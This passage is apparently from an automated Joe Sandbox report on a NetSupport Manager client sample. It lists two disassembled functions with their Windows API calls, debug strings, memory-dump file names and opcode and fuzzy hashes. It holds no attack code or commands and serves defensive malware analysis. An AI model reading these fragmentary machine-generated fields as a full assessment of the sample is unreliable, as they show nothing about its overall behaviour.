                                                                                    • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                    Function 1110F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                    • API String ID: 2400454052-4183089485
                                                                                    • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                    • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                    • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                    • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
                                                                                    Function 11153500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 11153524
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11153513
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115350E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 67735064-2830328467
                                                                                    • Opcode ID: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                    • Instruction ID: 41066489dfbac7b1bedb0840a1a625780406ac6dbed52086b597086e3eac16ab
                                                                                    • Opcode Fuzzy Hash: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                    • Instruction Fuzzy Hash: 5FD022B5B69229ABC31096A1EC84FC1B3849B0832CF011834F03553400E660B8C08341